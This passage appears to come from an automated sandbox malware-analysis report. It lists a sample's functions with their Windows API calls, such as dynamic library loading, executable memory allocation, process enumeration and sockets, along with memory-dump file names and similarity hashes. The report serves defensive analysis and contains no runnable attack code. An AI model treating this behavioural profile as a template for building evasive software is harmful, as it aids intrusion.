                                                                        • Opcode Fuzzy Hash: b41fa3a92fdb40329000057feba41bb9cd44cf268eed978b19bce05162abcc11
                                                                        • Instruction Fuzzy Hash: F8E08C78A103028BE7B04A2AD958A4676E8BB05314B40845DE8C5E2608D778E4408F10
                                                                        Function 00FF4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF4AF7,?), ref: 00FF4BB8
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FF4BCA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: ade066bfbd7526844d046fdb961453ab42fc96f5d4b80d3210809d1315161706
                                                                        • Instruction ID: e66491cd55e3f8dbffa0eaa301d5f854e75dde8f3b7e7987d71956685ce94168
                                                                        • Opcode Fuzzy Hash: ade066bfbd7526844d046fdb961453ab42fc96f5d4b80d3210809d1315161706
                                                                        • Instruction Fuzzy Hash: 96D0C771D203128FD7308F32E818B07B2E4AF02360B00CC2EE5C2E6518EA74E880CB00
                                                                        Function 00FF4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF4B44,?,00FF49D4,?,?,00FF27AF,?,00000001), ref: 00FF4B85
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FF4B97
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: 1c1e8ee5acdda458616a3b83bdfbf2a8dc151b04f3c087a628edce03f92f1f1f
                                                                        • Instruction ID: 477f203377bfaf101d08a33b6451c383ee2e27b6544f919b78fbe6f4197188b1
                                                                        • Opcode Fuzzy Hash: 1c1e8ee5acdda458616a3b83bdfbf2a8dc151b04f3c087a628edce03f92f1f1f
                                                                        • Instruction Fuzzy Hash: 31D0E2719207128FD7309E32E828B1676E4AF46261F11896EA9C6E6558E674E880DA24
                                                                        Function 00FF55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF5E3D), ref: 00FF55FE
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FF5610
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: 2398b170bc7f55cf0fa033285b50f74d41de0a735670a02df048c5330f76e4cd
                                                                        • Instruction ID: c7de6ea3b3b775f99aa2e66393c79f9f8d63bba60852a1ed592c249e0ecb56b7
                                                                        • Opcode Fuzzy Hash: 2398b170bc7f55cf0fa033285b50f74d41de0a735670a02df048c5330f76e4cd
                                                                        • Instruction Fuzzy Hash: D2D01774D20B128FEB309F32D808626B6E4AF06B69B11C92EE5D6E6158E674D880CB54
                                                                        Function 01061447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,01061696), ref: 01061455
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01061467
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 5cbe67f12dae4e9d675f205dbcc175775d201b327b112882123a37f1df81e089
                                                                        • Instruction ID: 7b14411f0a2443156502872287329d40e8171fb4cc514a8d9bd9952e4b647712
                                                                        • Opcode Fuzzy Hash: 5cbe67f12dae4e9d675f205dbcc175775d201b327b112882123a37f1df81e089
                                                                        • Instruction Fuzzy Hash: 73D0C7709113128FEB208F3AD90820276E8AF03281B00C86EE4D6E7144EB74E0C0CB00
                                                                        Function 010597CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,010593DE,?,01070980), ref: 010597D8
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 010597EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 250c38365d416bce6e619696215d240d8e0a3c92dd56202c7a5dfda28b22316a
                                                                        • Instruction ID: 47652e0ba440cea3b5d91a705eee111ea8c642eac8e0c90963f99d30c331a723
                                                                        • Opcode Fuzzy Hash: 250c38365d416bce6e619696215d240d8e0a3c92dd56202c7a5dfda28b22316a
                                                                        • Instruction Fuzzy Hash: E6D017B0920717CFE7709F36E898606B6E4FF06395B11C96EE8D6E6108EA74D480CB11
                                                                        Function 01037D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dba9859cee5fcb8704c3011dee62c3a1d46ff225bdd581339f1651a7ec789743
                                                                        • Instruction ID: 8d6beddd5bbbc251f45d90d7363d4b93877c8f0299d0bd981d578f2f14fb2745
                                                                        • Opcode Fuzzy Hash: dba9859cee5fcb8704c3011dee62c3a1d46ff225bdd581339f1651a7ec789743
                                                                        • Instruction Fuzzy Hash: 66C14A74A00206EFDB54CF98C884AAEFBB9FF88714B108599F945EB251D731ED81CB90
                                                                        Function 0105E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0105E7A7
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0105E7EA
                                                                          • Part of subcall function 0105DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0105DEAE
                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0105E9EA
                                                                        • _memmove.LIBCMT ref: 0105E9FD
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                        • String ID:
                                                                        • API String ID: 3659485706-0
                                                                        • Opcode ID: f3f0984b6b8de16581df396bd7611767f6e8bca2b9fd09447340a609d474c1fc
                                                                        • Instruction ID: 77f2ad9439789d5af83ed0b292daed73db8854a4e94e02e3ecc7d09bb1e27aa4
                                                                        • Opcode Fuzzy Hash: f3f0984b6b8de16581df396bd7611767f6e8bca2b9fd09447340a609d474c1fc
                                                                        • Instruction Fuzzy Hash: D4C12771A083019FC795DF28C48096ABBE4FF89714F04896DF9D99B351D731EA46CB82
                                                                        Function 0105877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 010587AD
                                                                        • CoUninitialize.OLE32 ref: 010587B8
                                                                          • Part of subcall function 0106DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,01058A0E,?,00000000), ref: 0106DF71
                                                                        • VariantInit.OLEAUT32(?), ref: 010587C3
                                                                        • VariantClear.OLEAUT32(?), ref: 01058A94
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: 1a1796225562ac0bbc674d6440884f1d4de9cf5f683a38fd39c68bd69d0bd49e
                                                                        • Instruction ID: 084356b56678a54d7c5936f09f294125f1b0f1a0d0532bc9b0e8644b1980097a
                                                                        • Opcode Fuzzy Hash: 1a1796225562ac0bbc674d6440884f1d4de9cf5f683a38fd39c68bd69d0bd49e
                                                                        • Instruction Fuzzy Hash: 93A125756047429FDB50DF56C880B2AB7E4BF88364F04894DFA959B3A1CB34ED01CB92
                                                                        Function 0103814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038308
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038320
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,01070988,000000FF,?,00000000,00000800,00000000,?,01073C4C,?), ref: 01038345
                                                                        • _memcmp.LIBCMT ref: 01038366
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                        • String ID:
                                                                        • API String ID: 314563124-0
                                                                        • Opcode ID: 3696b2e6c7318b5af73962c18fa52acd026404f054e69acbe7d04539ed270df5
                                                                        • Instruction ID: 493d190b1d1780a41e7f45f9351432d6c2c70d7a6684cdbf78fc03dd4932b15a
                                                                        • Opcode Fuzzy Hash: 3696b2e6c7318b5af73962c18fa52acd026404f054e69acbe7d04539ed270df5
                                                                        • Instruction Fuzzy Hash: 3F812B71A00109EFCB04DF98C984EEEB7B9FF89315F148599F545AB260DB71AE05CB60
                                                                        Function 0103749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: cbf658f0e4f75b486b526b69a969d80b1bf4910914246c54a582ffff6b6011f5
                                                                        • Instruction ID: bfca8f633ceb2266b70f6755206a775881e664c93816cf05ce21685d859c47a5
                                                                        • Opcode Fuzzy Hash: cbf658f0e4f75b486b526b69a969d80b1bf4910914246c54a582ffff6b6011f5
                                                                        • Instruction Fuzzy Hash: 9051D6B06007439BDB249F79C8A4A6DB7ECAF99310F20881FE5C6D76E1DB7498409B05
                                                                        Function 0105F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0105F526
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0105F534
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0105F5F4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0105F603
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                        • String ID:
                                                                        • API String ID: 2576544623-0
                                                                        • Opcode ID: 618a7ed423114dfcd850960fcfd260c962b84383fce2ece648baa9443da4dcb5
                                                                        • Instruction ID: d46e3823dcc6f66cd343f9c47c0e2d025b3059e62928e0c0ea94faa3d6b00dcd
                                                                        • Opcode Fuzzy Hash: 618a7ed423114dfcd850960fcfd260c962b84383fce2ece648baa9443da4dcb5
                                                                        • Instruction Fuzzy Hash: B0518C71504351AFD360EF24DC85EABB7E8FF98700F00491DFA85972A1EB74A904CB92
                                                                        Function 0100492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 2782032738-0
                                                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                        • Instruction ID: 82f75519d6f3cc7453336a992cbe9e8e8963dbcbc25cb59cd84b5613b1b8ddd1
                                                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                        • Instruction Fuzzy Hash: ED41A571A04606ABFB6ACEADC8809AE7BE5AF45260F14817DE7D5C76C0D7709D808B48
                                                                        Function 0103A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0103A68A
                                                                        • __itow.LIBCMT ref: 0103A6BB
                                                                          • Part of subcall function 0103A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0103A976
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0103A724
                                                                        • __itow.LIBCMT ref: 0103A77B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 42876b213e3debc92ed20464a0d4f5894f21c0f7e44fdf50a880c94aaad20574
                                                                        • Instruction ID: 188300b6b33e9803136fb1fb6b95930a7414efce0b12b4220efccead335ce2fc
                                                                        • Opcode Fuzzy Hash: 42876b213e3debc92ed20464a0d4f5894f21c0f7e44fdf50a880c94aaad20574
                                                                        • Instruction Fuzzy Hash: 8A417D74A00209EBDF21EF54CC95BFE7BB9BF88750F000069BA85A3291DB749944DAA1
                                                                        Function 01057095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 010570BC
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010570CC
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01057130
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0105713C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                        • String ID:
                                                                        • API String ID: 2214342067-0
                                                                        • Opcode ID: 370ad70a9f5d2391751a43cb4c7c7bbc1084638f50f7078b3235dcd3119b237e
                                                                        • Instruction ID: e66a55b3d873da258c5d0e0f4ec23d8d790cdada5f08654d641da13f14f7e5ca
                                                                        • Opcode Fuzzy Hash: 370ad70a9f5d2391751a43cb4c7c7bbc1084638f50f7078b3235dcd3119b237e
                                                                        • Instruction Fuzzy Hash: 2F41C3757002006FE760AF29DC86F2A77E99B44B10F04815CFA599F3C2DA79AC009B91
                                                                        Function 01056B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,01070980), ref: 01056B92
                                                                        • _strlen.LIBCMT ref: 01056BC4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID:
                                                                        • API String ID: 4218353326-0
                                                                        • Opcode ID: aff44e64cf2a3693167cb493537e18ab0a094a7afc5ca3c0561205d92068ef2b
                                                                        • Instruction ID: b31cd6c3827c4e372a73054bd46bfeddb0b4e723fcc7318c7c5982ef0b4f3a00
                                                                        • Opcode Fuzzy Hash: aff44e64cf2a3693167cb493537e18ab0a094a7afc5ca3c0561205d92068ef2b
                                                                        • Instruction Fuzzy Hash: FA411371A00109ABDB54FB64CC90EFFB7A9EF54310F448154FD8A9B2A1DB31AD00CB50
                                                                        Function 01068E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01068F03
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
